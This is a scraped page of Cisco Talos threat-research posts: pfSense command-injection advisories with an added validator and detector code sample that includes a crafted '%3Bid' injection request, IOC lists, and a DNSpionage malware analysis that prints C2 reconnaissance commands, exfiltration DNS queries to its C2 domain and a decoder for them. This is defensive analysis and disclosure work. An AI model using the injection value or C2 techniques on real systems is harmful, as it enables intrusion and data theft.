Talos Group, by Cisco

An introduction to offensive capabilities of Active Directory on UNIX

Tue, 04/12/2018 - 14:21
Tim Wadhwa-Brown of Portcullis Labs authored this post.

In preparation for our talk at Black Hat Europe, Security Advisory EMEAR would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.

Background to Active Directory integration solutions
Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"

A typical Active Directory integration solution (in this case SSSD) bears a striking similarity to what a user might see on Windows. Notably, you have:

  • DNS – Used for name resolution
  • LDAP – Used for "one-time identification" and assertion of identity
  • Kerberos – Used for ongoing authentication
  • SSSD – Like LSASS
  • PAM – Like msgina.dll or the more modern credential providers

You can see a breakdown of this process here. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. are typically pushed as flat files to hosts.

Our research
Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. We've been talking about successful attacks against components such as LSASS and Kerberos for quite some time: Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer (Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor at how a blue team might spot an adversary performing them.

As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing appropriate strategies to allow blue teams to detect and respond to such incursions. The presentation and the tactics, tools, and procedures for this talk will be available after our Black Hat Europe talk. They will also be available here, and at our GitHub repo.

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability

Mon, 03/12/2018 - 17:51

Brandon Stultz of Cisco Talos discovered these vulnerabilities.
Executive summary
Today, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode. pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details
Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense is due to the lack of sanitization of the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter.
For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization of the 'powerd_ac_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021) 

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization of the 'powerd_battery_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', the Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.
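
The three flaws share one shape: a POST parameter that should only ever be a fixed keyword reaches a shell unchecked. As an added illustration (not pfSense code, not Talos's Snort rules), the Python below shows the allowlist validation that closes that class of bug and a defender-side check that flags POSTs to system_advanced_misc.php carrying anything but an allowed mode. The set of valid powerd modes is an assumption taken from the pfSense UI, not from the advisory, and the sample requests are constructed.

```python
import re
from typing import List
from urllib.parse import parse_qs, urlsplit

# The three POST parameters named in the advisory (TALOS-2018-0690).
POWERD_PARAMS = ("powerd_normal_mode", "powerd_ac_mode", "powerd_battery_mode")

# ASSUMPTION: the powerd(8) mode keywords the pfSense UI submits. Check this
# set against the pfSense release you run; it is not taken from the advisory.
ALLOWED_MODES = frozenset({"hadp", "adp", "min", "max"})

# Characters with meaning to a shell. None of them can appear in a legitimate
# mode keyword, so any hit in these parameters is a strong injection signal.
SHELL_META = re.compile("[" + re.escape(";&|`$<>(){}\n\r\\'\"") + "]")


def validate_mode(value: str) -> str:
    """Hardened server-side handling: accept an exact allowlisted keyword only.

    This is the allowlist pattern that closes a command-injection flaw of this
    kind; it is example code, not pfSense's actual patch.
    """
    if value not in ALLOWED_MODES:
        raise ValueError(f"rejected powerd mode: {value!r}")
    return value


def inspect_post(request_line: str, body: str) -> List[str]:
    """Defender-side check of one HTTP request (request line plus urlencoded
    body) for exploitation attempts against system_advanced_misc.php.

    Returns one finding per suspicious parameter; an empty list means clean.
    """
    findings: List[str] = []
    method, target, _version = request_line.split(" ", 2)
    if method != "POST" or urlsplit(target).path != "/system_advanced_misc.php":
        return findings
    params = parse_qs(body, keep_blank_values=True)  # percent-decodes values
    for name in POWERD_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                findings.append(f"{name}: shell metacharacter in {value!r}")
            elif value not in ALLOWED_MODES:
                findings.append(f"{name}: {value!r} is not an allowed mode")
    return findings


# Constructed sample requests (not captured traffic): a normal UI save, and one
# where powerd_normal_mode carries a ';' followed by a second command.
BENIGN_REQUEST = (
    "POST /system_advanced_misc.php HTTP/1.1",
    "powerd_enable=yes&powerd_ac_mode=hadp&powerd_battery_mode=adp&powerd_normal_mode=hadp",
)
SUSPECT_REQUEST = (
    "POST /system_advanced_misc.php HTTP/1.1",
    "powerd_enable=yes&powerd_normal_mode=hadp%3Bid&powerd_ac_mode=hadp",
)

if __name__ == "__main__":
    print(inspect_post(*BENIGN_REQUEST))   # []
    print(inspect_post(*SUSPECT_REQUEST))  # one finding for powerd_normal_mode
```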

Conclusion
Cisco Talos tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.
Coverage
The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules: 48178

Threat Roundup for Nov. 23 to Nov. 30

Fri, 30/11/2018 - 18:33

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.Donoff-6759556-0
    Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable.
  • Doc.Malware.00536d-6758981-0
    Doc.Malware.00536d is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.
  • Xls.Dropper.Donoff-6758223-0
    Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable.
  • Win.Trojan.Emotet-6758832-0
    Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.
  • Doc.Malware.Valyria-6757519-0
    Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.
  • Win.Virus.Triusor-6757540-0
    Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder static analysis, and the malware contains code that complicates dynamic analysis. Once executed, the samples perform code injection.
Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • 3ek6[.]top
  • pvy1[.]top
  • di29[.]top
  • 68d4[.]top
Files and or directories created
  • %LocalAppData%\Temp\sDweD.exe
  • %LocalAppData%\Temp\22dughsl.5qd.ps1
  • %LocalAppData%\Temp\4s5lt2th.dfc.psm1
  • %LocalAppData%\Temp\4e5cllpa.loj.psm1
  • %LocalAppData%\Temp\zbaj2qbd.fvr.ps1
File Hashes

Screenshots of Detection: AMP

Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • cysioniven[.]com
Files and or directories created
  • %LocalAppData%\Temp\ebeqjwi0.znf.ps1
  • %LocalAppData%\Temp\xnakv4n3.jj0.psm1
  • %LocalAppData%\Temp\glq130qw.p3e.psm1
  • %LocalAppData%\Temp\haoyv1sm.xuc.ps1
  • %AppData%\900194a4.exe
File Hashes

Screenshots of Detection: AMP

Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • momdopre[.]top
  • fileiiiililliliillitte[.]xyz
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat
  • %LocalAppData%\Temp\0w4zsktj.rxt.psm1
  • %LocalAppData%\Temp\vnug35u0.1pd.ps1
  • %LocalAppData%\Temp\cmnt0etf.0lt.psm1
  • %LocalAppData%\Temp\l21izk2f.bel.ps1
File Hashes

Screenshots of Detection: AMP

Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 67[.]216[.]131[.]134
  • 88[.]235[.]54[.]71
  • 24[.]190[.]11[.]79
  • 192[.]208[.]165[.]34
  • 98[.]6[.]145[.]178
  • 207[.]244[.]67[.]214
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\SysWOW64\4WPGc4HlcDQ.exe
File Hashes

Screenshots of Detection: AMP

Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • mnesenesse[.]com
  • ostrolista[.]com
Files and or directories created
  • %LocalAppData%\Temp\qrldddmq.hyb.psm1
  • %LocalAppData%\Temp\swfrthjc.vr1.ps1
File Hashes

Screenshots of Detection: AMP

Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe
  • %WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe
File Hashes

Screenshots of Detection: AMP

DNSpionage Campaign Targets Middle East

Tue, 27/11/2018 - 13:02
This blog post was authored by Warren Mercer and Paul Rascagneres.

Executive Summary
Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks.

Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.

In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. Let's Encrypt provides X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful.

In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.

Infection vectors
Fake job websites
The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:

  • hr-wipro[.]com (with a redirection to
  • hr-suncor[.]com (with a redirection to

These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.

The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.

At this time, we don't know how the target received these links. The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.

Malicious Office document No. 1
Upon opening the first Office document, the user receives a message that says "Content Mode Available:"
Malicious Office document No. 2
During our investigation, we discovered another, similar, Office document deploying the same payload. In this campaign, the document was an Excel document that contained text in Russian:

The title of the document is "service formula for hydraulic fracturing." The document is a form that a hydraulic fracturing company would use to calculate its prices. The original name of the document is "RN.GRP(v0.41).xls." RN-GRP is a Russian service company that provides hydraulic fracturing services.

Macros used
The macros of the analysed samples can be divided into two steps:
  1. When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svchost_serv.doc
  2. When the document is closed, the macro will rename the file "svchost_serv.doc" to "svchost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.
The purpose of these two steps is to avoid sandbox detection.

The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. The macros, while available through analysis, are also password-protected in Microsoft Word to stop the victim from exploring the macro code via Microsoft Office.

Additionally, the macro uses classical string obfuscation in order to avoid strings detection:

The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."

DNSpionage malware
Malware analysis
The malware dropped by the malicious document is an undocumented remote administration tool. We are naming it DNSpionage due to the fact that it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.

DNSpionage creates its own data in the running directory:
The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.

The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.

The log.txt file contains logs in plain text.

All executed commands can be logged in this file, along with their results.

The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.

All data is transferred as JSON, which is why a large part of the malware's code is a JSON library.

Communication Channels
The malware uses HTTP and DNS in order to communicate with the C2 server.

HTTP mode
A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and receives the IP of an HTTP server ( during the investigation). An example of a DNS request:
The malware is also able to craft DNS requests that provide the attacker with further information. Here is an example of such a request:
In this context, the first four characters are randomly generated by the malware using rand(). The rest of the domain is encoded in base32; once decoded, the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file could not be retrieved on the infected machine; this message is used to inform the attacker.

The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.

This request will be used to create the configuration file, particularly to set the custom base64 dictionary.

The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system).

The purpose of this request is to retrieve the orders. The site is a fake Wikipedia page:

The commands are included in the source code of the page:

In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. Here is another example with a custom alphabet in the configuration file:

Here are the three commands automatically sent to the compromised system:

  • {"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}
  • {"c": "hostname", "i": "-5000", "t": -1, "k": 0}
  • {"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}

The malware generates the following snippet of code after executing those commands:

The attackers ask for the username and hostname to retrieve the infected user's domains. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.

Finally, CreateProcess() executes the commands, and their output is redirected back to the malware through a pipe created with CreatePipe().

DNS mode
The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. This option is dictated within the configure.txt file on the infected machine. Using DNS can make it easier to send information back to the attacker, as DNS traffic generally bypasses the proxies or web filtering in place.

First, the malware initiates a DNS query to ask for orders, for example:
The first four characters must be ignored; as mentioned earlier in the article, these are randomly generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies to the DNS request with an answer that is an IP address; while not always a valid IP, it is perfectly acceptable for the DNS protocol, for example . We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.

Secondly, the malware performs a DNS query with the command ID:
t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 => "0GT\x01")
The C2 server will return a new IP. If we convert its value to ASCII, we have "dir\x00", the command to be executed.

Finally, the result of the executed command is sent back in multiple DNS requests:
gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -> GJDVIAJAKZXWY000 -> "2GT\x01 Vol"
TwGHGJDVIATVNVSSA000.0ffice36o[.]com -> GJDVIATVNVSSA000 -> "2GT\x02ume"
1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -> GJDVIA3JNYQGI000 -> "2GT\x03in d"
iucCGJDVIBDSNF3GK000.0ffice36o[.]com -> GJDVIBDSNF3GK000 -> "2GT\x04rive"
viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -> GJDVIBJAIMQGQ000 -> "2GT\x05 C h"
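
To make the covert channel concrete, here is an added Python decoder (not Talos's tooling and not the malware's code) that strips the four random characters, reverses the '0'-for-'=' padding substitution, splits out the type byte, target ID and sequence byte, and reassembles the exfiltrated output from the five queries quoted above. The A-record answers are constructed from the report's description, since the actual IPs are not on the page, and the meaning of the message-type byte ('0' request for orders, '2' command output) is inferred from the examples above.

```python
import base64
import struct
from typing import Dict, Iterable, NamedTuple, Tuple

# C2 domain from the report (defanged there as 0ffice36o[.]com).
C2_DOMAIN = "0ffice36o.com"


class Beacon(NamedTuple):
    msg_type: str    # first byte: '0' asks for orders, '2' carries command output (inferred)
    target_id: str   # two-character victim ID, e.g. "GT"
    sequence: int    # one-byte request / chunk counter
    payload: bytes   # remaining bytes: a chunk of command output, or empty


def decode_query(qname: str) -> Beacon:
    """Decode one DNSpionage query name.

    Layout described in the report: 4 random chars from rand(), then base32 of
    "<type><target><seq>[data]" with the '=' padding written as '0'.
    """
    host, _, domain = qname.partition(".")
    if domain.lower() != C2_DOMAIN:
        raise ValueError(f"not a {C2_DOMAIN} query: {qname}")
    encoded = host[4:]  # drop the random prefix first: it may itself contain a '0'
    raw = base64.b32decode(encoded.replace("0", "="), casefold=True)
    if len(raw) < 4:
        raise ValueError(f"label too short: {qname}")
    return Beacon(chr(raw[0]), raw[1:3].decode("ascii"), raw[3], raw[4:])


def reassemble_output(qnames: Iterable[str]) -> Dict[str, bytes]:
    """Rebuild exfiltrated command output per target from type-'2' queries,
    ordering chunks by their sequence byte (queries may be logged out of order)."""
    chunks: Dict[str, Dict[int, bytes]] = {}
    for q in qnames:
        b = decode_query(q)
        if b.msg_type == "2":
            chunks.setdefault(b.target_id, {})[b.sequence] = b.payload
    return {tid: b"".join(parts[i] for i in sorted(parts)) for tid, parts in chunks.items()}


def parse_order_answer(ip: str) -> Tuple[int, int]:
    """A-record answer to a type-'0' query: per the report, the first 16-bit
    value is the command ID and the second the size of the command."""
    return struct.unpack(">HH", bytes(int(o) for o in ip.split(".")))


def answer_to_text(ip: str) -> bytes:
    """A-record answer to the command-ID query: its four octets read as ASCII
    are the command itself (the report's example decodes to "dir\\x00")."""
    return bytes(int(o) for o in ip.split("."))


# The five exfiltration queries and the command-ID query quoted in the report,
# plus a constructed type-'0' query matching the report's description of it.
SAMPLE_QUERIES = [
    "t0qIGBDVIAA0.0ffice36o.com",          # constructed: "0GT\x00", ask for orders
    "t0qIGBDVIAI0.0ffice36o.com",          # from report: "0GT\x01", fetch command 1
    "TwGHGJDVIATVNVSSA000.0ffice36o.com",  # chunk 2 (listed out of order on purpose)
    "gLtAGJDVIAJAKZXWY000.0ffice36o.com",  # chunk 1
    "1QMUGJDVIA3JNYQGI000.0ffice36o.com",  # chunk 3
    "iucCGJDVIBDSNF3GK000.0ffice36o.com",  # chunk 4
    "viLxGJDVIBJAIMQGQ000.0ffice36o.com",  # chunk 5
]
# Constructed answers consistent with the report's description (real IPs not on the page).
ORDER_ANSWER = "0.1.0.3"          # 0x0001 = command ID, 0x0003 = command size
COMMAND_ANSWER = "100.105.114.0"  # octets as ASCII: "dir\x00"

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q, "->", decode_query(q))
    print(parse_order_answer(ORDER_ANSWER), answer_to_text(COMMAND_ANSWER))
    print(reassemble_output(SAMPLE_QUERIES))  # {'GT': b' Volume in drive C h'}
```

Note that the second chunk decodes to "ume " with a trailing space, so the reassembled text is the familiar start of `dir` output rather than the "ume" shown in the listing above.
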
Victimology
Thanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. Here is the graph for 0ffice36o[.]com, the DNS we mentioned above:

The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.

DNS redirection
Talos discovered three IPs linked to the DNSpionage domain:


The three IPs are hosted by DeltaHost.

The last one was used in a DNS redirection attack between September and November. Multiple nameservers belonging to the public sector in Lebanon and UAE, as well as some companies in Lebanon, were apparently compromised, and hostnames under their control were pointed to attacker-controlled IP addresses. The attackers redirected the hostnames to the IP for a short time. Just before redirecting the IP, the attackers created a certificate matching the domain name with the Let's Encrypt service.

In this section, we will present all the DNS redirection instances we identified and the attacker-generated certificates associated with each. We don't know if the redirection attack was ultimately successful, or what exact purpose the DNS redirection served. However, the impact could be significant, as the attackers were able to intercept all traffic destined for these hostnames during this time. Because the attackers targeted email and VPN traffic specifically, they may have been used to harvest additional information, such as email and/or VPN credentials.

As incoming email would also be arriving at the attackers' IP address, if there was multi-factor authentication, it would allow the attackers to obtain MFA codes to abuse. Since the attackers were able to access email, they could carry out additional attacks or even blackmail the target.

The DNS redirection we identified occurs in multiple locations where there is no direct correlation of infrastructure, staff, or job routines. It also occurs in both the public and private sectors. Therefore, we believe it was not human error, nor a mistake by an administrative user within any of the impacted organisations. This was a deliberate, malicious attempt by the attackers to redirect DNS.

Lebanon government redirection
Talos identified that the Finance Ministry of Lebanon's email domain was the victim of a malicious DNS redirection.

  • was redirected to on Nov. 6 06:19:13 GMT. On the same date at 05:07:25 a Let's Encrypt certificate was created.
UAE government redirection
UAE public domains were targeted, as well. We identified a domain from the Police (VPN and College) and the Telecommunication Regulatory Authority.

  • redirected to on Sept. 13 at 06:39:39 GMT. On the same date at 05:37:54 a Let's Encrypt certificate was created.
  • redirected to on Sept. 15 at 07:17:51 GMT. A Let's Encrypt certificate was also created at 06:15:51 GMT.
  • redirected to on Sept. 24. A Let's Encrypt certificate was also created at 05:41:49 GMT.
Middle East Airline redirection
Talos discovered that Middle East Airlines (MEA), a Lebanese airline, was also the victim of DNS redirection.

  • redirected to on Nov. 14 at 11:58:36 GMT
    On Nov. 6, at 10:35:10 GMT, a Let's Encrypt certificate was created.

This certificate contains Subject Alternative Names (DNS names), a certificate feature that allows multiple domains to be covered by a single certificate for SSL/TLS:

These domains show a clear understanding of the victims' domains, which leads us to believe the attacker was active in these environments in order to learn which specific domains and certificates they would be required to produce.

Our investigation discovered two events: the DNSpionage malware and a DNS redirection campaign. In the case of the malware campaign, we don't know the exact target, but we do know the attackers went after users in Lebanon and the UAE. However, as outlined above, we were able to uncover the targets of the redirect campaign.

We are highly confident that both of these campaigns came from the same actor. However, we do not know much about the location of the actors and their exact motivations. It is clear that this threat actor was able to redirect DNS from government-owned domains in two different countries over the course of two months, as well as a national Lebanese airline. They were able to work from the system's point of view by using a Windows malware, as well as the network, by using DNS exfiltration and redirection. It is unclear if these DNS redirection attacks were successful, but the attackers have kept up their efforts, launching five attacks so far this year, including one in the past two weeks.

Users should treat these campaigns as proof that endpoint protection and network protection both need to be as strong as possible. This is an advanced actor with its sights set on important targets, and it does not appear to be letting up any time soon.

Coverage
Snort rules 48444 and 48445 will prevent DNSpionage from making an outbound connection.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

Indicators of Compromise (IOCs)
The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Fake job websites:

Malicious documents:
9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 (LB submit)
15fe5dbcd31be15f98aa9ba18755ee6264a26f5ea0877730b00ca0646d0f25fa (LB submit)
e279985597af22dddf1217ee35a8cffb17d1418ae1b4bae2d9ea79c0c6963a85 (RU submit)

DNSpionage samples:
2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec
82285b6743cc5e3545d8e67740a4d04c5aed138d9f31d7c16bd11188a2042969

C2 Server IPs:

C2 Server Domains:

DNS Hijack Domains (pointed to
2018-11-14 :
2018-11-06 :
2018-09-24 :
2018-09-15 :
2018-09-13 :

Domains in the MEA certificate (on

Beers with Talos EP42: To the Moon, Everyone!

Wed, 21/11/2018 - 18:19

Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #42 show notes: Recorded Nov. 16, 2018 —

Cyber moonshot, baby! It’s just like that time the US raced everyone to the moon, except completely different and in-no-way related! Do we need a “cyber moonshot”? Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything.

We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.
The timeline:
The topics
01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting
12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.
1:00:19 - Closing thoughts and parting shots
The links
Cyber Moonshot draft report (public link)
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
[email protected]

Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor

Tue, 20/11/2018 - 13:35

A member of Cisco Talos discovered these vulnerabilities.
Executive summary
Today, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details
Atlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Processor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write through it. When opening an RTF document, the application first fingerprints it in order to select the correct file format parser. The write corrupts the memory of the application, allowing an attacker to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions tested
Talos tested and confirmed that Atlantis Word Processor, version is affected by these vulnerabilities.

Conclusion
All three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don't open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.

Coverage
The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules: 48385, 48386, 48389 - 48392

What scams shoppers should look out for on Black Friday and Cyber Monday

Mon, 19/11/2018 - 18:28
